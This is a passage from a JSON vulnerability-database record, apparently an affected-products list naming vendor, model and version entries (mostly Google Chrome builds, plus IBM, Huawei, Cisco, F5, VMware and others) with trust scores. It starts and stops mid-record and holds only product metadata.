"0" }, { "model": "qradar security information and event manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.35" }, { "model": "oceanstor hvs85t v100r001c99", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1304.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.61" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1" }, { "model": "ipso r75.46", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.670.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.378.0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.27" }, { "model": "qlogic gb intelligent pass-thru module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.10.1.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.551.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1037" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.611.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1060" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.547.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.300.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.509.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.387.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.382.3" }, { "model": "vcenter site recovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.290.0" }, { "model": "oceanstor s5500t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7970" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.50" }, { "model": "gaia os r75.0", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "nsx for multi-hypervisor", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.386.0" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1056.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.839.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1277.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.764.0" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.616.0" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.66" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.105" }, { "model": "nexus intercloud for vmware", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.45" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.564.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1046" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1081.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.868.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.42" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.1.72" }, { "model": "oceanstor s6800t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9302" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.397.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.70" }, { "model": "secureplatform r70.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.99" }, { "model": "oceanstor n8000 oceanstor s2300", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v100" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.85" }, { "model": "security access manager for enterprise single sign-on", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.7" }, { "model": "move antivirus multi-platform", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "ib6131 40gb infiniband switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.491.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.74" }, { "model": "exadata storage server software", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "nsm3000 appliances", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1054.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.535.1" }, { "model": "espace u2990 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1289.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.58" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.825.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.814.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.600.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.566.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.877.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.860.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.475.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1070.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.102" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.2.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.958.1" }, { "model": "gaia r77.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.94" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.16" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.3" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.11" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.31" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "oceanstor s8100 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.415.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "gaia embedded r70.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.108" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.32" }, { "model": "vcenter application discovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1020.0" }, { "model": "enterprise linux els", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.614.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.57" }, { "model": "gaia embedded r70.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.344.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.9" }, { "model": "move antivirus multi-platform", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.235" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.156.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.111" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.18" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.715.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7535061.121.225.06100" }, { "model": "service control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80000" }, { "model": "secureplatform r75.40vs", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "t620 flexible dual core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "oceanstor s6800t v100r005c50", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.17" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.505.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1063.0" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.286.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "gaia embedded r71.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "oceanstor vis6600t v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.15" }, { "model": "vcloud automation center application services", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.723.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.725.0" }, { "model": "oceanstor 9000e v100r002c19", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storefabric h-series switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.224" }, { "model": "ipso r70.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.8" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.52" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.358.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.2" }, { "model": "vcenter infrastructure navigator", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.754.0" }, { "model": "ipso r75", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1007" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1659.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.783.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.19" }, { "model": "ios-xr", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1047" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1052" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.78" }, { "model": "gaia r70.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1690.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.687.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.308" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.820.0" }, { "model": "associates user activity reporting module", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1044.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.109" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "infosphere balanced warehouse c3000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.432.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.731.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.89" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.560.0" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.819.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.324.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1048" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1032.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.162" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.433.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.201" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, 